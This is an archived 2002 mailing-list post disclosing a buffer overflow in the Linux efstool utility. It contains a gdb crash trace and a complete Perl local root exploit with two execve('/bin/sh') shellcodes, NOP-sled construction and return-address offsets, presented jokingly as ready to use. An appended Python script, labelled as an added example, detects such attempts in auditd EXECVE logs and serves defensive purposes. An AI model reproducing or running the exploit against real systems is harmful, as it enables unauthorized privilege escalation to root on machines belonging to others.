efstool local root exploit

From: clorox@ptrace-networks.net
Date: Thu Jun 27 2002 - 17:46:39 PDT


     Ptrace Networks Security
    --------------------------
    
    An error in the efstool program on Red Hat, Mandrake, and Slackware
    is able to be successfully exploited through a buffer overflow.
    
    [clorox@ptnw clorox]$ efstool `perl -e 'print "A" x 3000'`
    Segmentation fault
    [clorox@ptnw clorox]$ gdb efstool
    GNU gdb 5.1.1
    Copyright 2002 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i386-mandrake-linux"...(no debugging symbols found)...
    (gdb) r `perl -e 'print "A" x 3000'`
    Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
    (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
    (no debugging symbols found)...(no debugging symbols found)...
    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    (gdb) info reg esp
    esp            0xbfffe890    0xbfffe890
    (gdb)
    
    
    example:
    #!/usr/bin/perl
    # efstool root exploit
    # written by clorox of Ptrace Networks for BKACC(Bored Kids At ComputerCamp)
    # give the campers internet grogan!
    #
    # tested to work on slackware 8, mandrake 8, mandrake 7.1
    # tweaks may be needed on the offset
    # method 1 works more often but
    # method 2 is faster but not too good
    #
    #
    # enjoy -clorox
    # perl efs.pl -1000
    
    $shellcode =
    "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
    "\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
    "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
    "\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
    "/bin/sh";
    
    $shellcode2 =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
    "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
    "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
    "\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
    "\xff\xff/bin/sh";
    
    $ret = "0xbfffe890";
    $offset = $ARGV[0];
    $nop = "\x90";
    
    if ($ARGV[1] eq "m1") {
            $len = 3000;
            for ($i = 0; $i < ($len - length($shellcode)); $i++) {
                    $buffer .= $nop;
            }
            $buffer .= $shellcode;
    } elsif ($ARGV[1] eq "m2") {
            $len = 10010;
            for ($i = 0; $i < ($len - length($shellcode)); $i++) {
                    $buffer .= $nop;
            }
            $buffer .= $shellcode2;
    } else {
            print "You must specify a method fool!\n";
            print "perl $0 <offset> m1 or m2\n";
    }
    
    $buffer .= pack('l', ($ret + $offset));
    $buffer .= pack('l', ($ret + $offset));
    exec("efstool $buffer");
    # and on the seventh day clorox said "LET THERE BE SHELL!"
    
    and on a personal note,
    grogan, or any other admins of ceboston, the campers here deserve internet 
    in our rooms; the computer labs aren't conducive to doing research. As you 
    can see, we would use it for positive things such as posting to Bugtraq. If 
    you read this and want to talk it over, talk to me; I'm in room 105 in New 
    Dorm.
    
    -max
    
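From the defender's side, the attempts shown in the post have a simple signature: a setuid helper being executed with a multi-kilobyte argument made up almost entirely of one repeated byte. The following Python script is an added example, not part of the original post or of efstool, that applies that heuristic to constructed auditd-style EXECVE records; the efstool watch list, the 1024-byte length threshold and the 90% filler ratio are assumptions to be tuned per site.

```python
import re
from collections import Counter

# Constructed auditd-style EXECVE records (not from the original post). auditd emits an
# argument containing non-printable bytes, e.g. a \x90 NOP sled, as unquoted hex.
SAMPLE_RECORDS = [
    'type=EXECVE msg=audit(1025225199.101:1): argc=2 a0="efstool" a1="' + "A" * 3000 + '"',
    'type=EXECVE msg=audit(1025225199.102:2): argc=2 a0="efstool" a1=' + "90" * 2960 + "cd80",
    'type=EXECVE msg=audit(1025225199.103:3): argc=2 a0="efstool" a1="/home/user/input.efs"',
    'type=EXECVE msg=audit(1025225199.104:4): argc=3 a0="ls" a1="-l" a2="/tmp"',
]
_ID_RE = re.compile(r"msg=audit\([\d.]+:(\d+)\)")
_ARG_RE = re.compile(r'\ba(\d+)=("([^"]*)"|([0-9A-Fa-f]+))')

def parse_execve(line):
    """Return (event_id, argv) with argv as a list of bytes, or None for a non-EXECVE line."""
    if not line.startswith("type=EXECVE"):
        return None
    event_id = int(_ID_RE.search(line).group(1))
    argv = []
    for m in sorted(_ARG_RE.finditer(line), key=lambda m: int(m.group(1))):
        quoted, hexval = m.group(3), m.group(4)
        argv.append(quoted.encode() if quoted is not None else bytes.fromhex(hexval))
    return event_id, argv

def suspicious_reasons(arg, max_len=1024, min_filler_len=64, filler_ratio=0.9):
    """Heuristics for one argument: oversized, or dominated by one repeated byte value."""
    reasons = []
    if len(arg) > max_len:
        reasons.append(f"argument length {len(arg)} exceeds {max_len}")
    if len(arg) >= min_filler_len:
        top_byte, count = Counter(arg).most_common(1)[0]
        if count / len(arg) >= filler_ratio:
            reasons.append(f"{count}/{len(arg)} bytes are 0x{top_byte:02x} (filler/sled pattern)")
    return reasons

def analyze(records, watched=frozenset({"efstool"})):
    """Flag EXECVE events whose program is on the watch list and carries a suspicious argument."""
    findings = []
    for line in records:
        parsed = parse_execve(line)
        if parsed is None:
            continue
        event_id, argv = parsed
        if not argv or argv[0].decode(errors="replace").rsplit("/", 1)[-1] not in watched:
            continue
        reasons = [r for arg in argv[1:] for r in suspicious_reasons(arg)]
        if reasons:
            findings.append((event_id, reasons))
    return findings
```

Running `analyze(SAMPLE_RECORDS)` flags events 1 and 2 (the 3000-byte "A" string and the hex-encoded NOP sled) and leaves the ordinary file argument and the unrelated `ls` invocation alone.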



    This archive was generated by hypermail 2b30 : Fri Jun 28 2002 - 21:40:33 PDT